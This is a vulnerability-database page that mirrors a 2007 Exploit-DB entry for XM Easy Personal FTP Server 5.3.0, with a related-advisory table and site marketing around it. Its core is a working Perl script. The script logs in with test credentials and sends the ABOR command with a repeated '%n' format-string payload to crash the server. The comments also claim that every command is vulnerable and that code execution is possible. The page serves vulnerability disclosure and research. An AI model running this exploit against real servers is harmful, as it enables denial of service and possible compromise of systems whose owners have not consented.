Lucene search
+L

XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service

🗓️ 28 Feb 2007 00:00:00Reported by Umesh WanveType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities, including Format String and Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2007-1195
2 Mar 200721:18
attackerkb
Circl
CVE-2007-1195
14 Jun 201200:00
circl
CVE
CVE-2007-1195
2 Mar 200719:00
cve
Cvelist
CVE-2007-1195
2 Mar 200719:00
cvelist
Exploit DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
14 Jun 201200:00
exploitdb
EUVD
EUVD-2007-1192
2 Mar 200719:00
euvd
NVD
CVE-2007-1195
2 Mar 200721:18
nvd
Prion
Buffer overflow
2 Mar 200721:18
prion
securityvulns
XM Ease Personal FTP Server format string vulnerability
23 Dec 200600:00
securityvulns
#!/usr/bin/perl -w
#=========================================================================================================
#                XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities
#                                   By Umesh Wanve
#=========================================================================================================
#
# Vendor: http://www.dxm2008.com/
#
#  Date: 28-02-2007
#
#
# 1) Multiple format string attacks. Every command is vulnerable.
#    With only single % also the server crashes.
#
# 2) Multiple buffer overflow occurs in commands if we fuzz the server( Better way use ur own fuzzer)
#
#
#    Code execution is possbile.
#    This is latest version of FTP server.
#
# ###########################################################################################

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "test";
my $pass = "test";


$exploit_string = "%n" x 10;


print ":: Trying to connect to target system at: $target...\n";

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";

print "Connected!\n";

$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";

$ftp->command("ABOR ",$exploit_string);                   # Every command is vulnerable. Use it what u like :)
print "Done!\n";

$ftp->quit;

# milw0rm.com [2007-02-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.04983
29